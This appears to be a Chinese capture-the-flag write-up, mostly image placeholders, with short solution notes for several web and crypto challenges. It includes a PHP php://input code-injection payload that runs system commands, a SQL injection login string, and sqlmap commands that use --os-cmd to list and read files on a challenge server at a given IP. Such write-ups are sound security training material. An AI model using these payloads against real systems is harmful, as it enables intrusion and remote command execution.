木册木兰

img

  • 下载附件,然后根据提示可以看出就是栅栏密码,所以直接解密得到

img

inputer

img

  • 先源码,这里要用到php://伪协议
  • 直接抓包然后改包,构造php://input,利用system("ls");输出当前目录下所包含的文件,发包后发现可利用

img

  • 那就直接用命令<?php system("cat /flag.txt");?>获得flag

img

WEB_blind_exec

img

LFI

img

baby_sql

1
admin' or '1'='1

img

WEB_randnum

img

WEB_babyphp

img

easy_getshell

img

sessionlfi

  • 源码中发现页面传参使用get方法,猜测存在sql注入漏洞

img

测试payload:

sqlmap -u http://218.94.60.213:13198/table.php?id=1 -dbs

爆破数据库,共有4个数据库

img

使用sqlmap的-os-cmd远程执行命令,看到根目录有flag字样文件

sqlmap -u http://218.94.60.213:13198/table.php?id=1 --os-cmd=“ls /”

img

最后继续使用远程命令查看得到flag

sqlmap -u http://218.94.60.213:13198/table.php?id=1 --os-cmd=“cat /flag_asflkhasklfhaklshfkjlashfjkas”

img

happy

  • 题目:

img

  • 解题代码:

img

rsarsa

  • 题目:

img

  • 解题代码:

img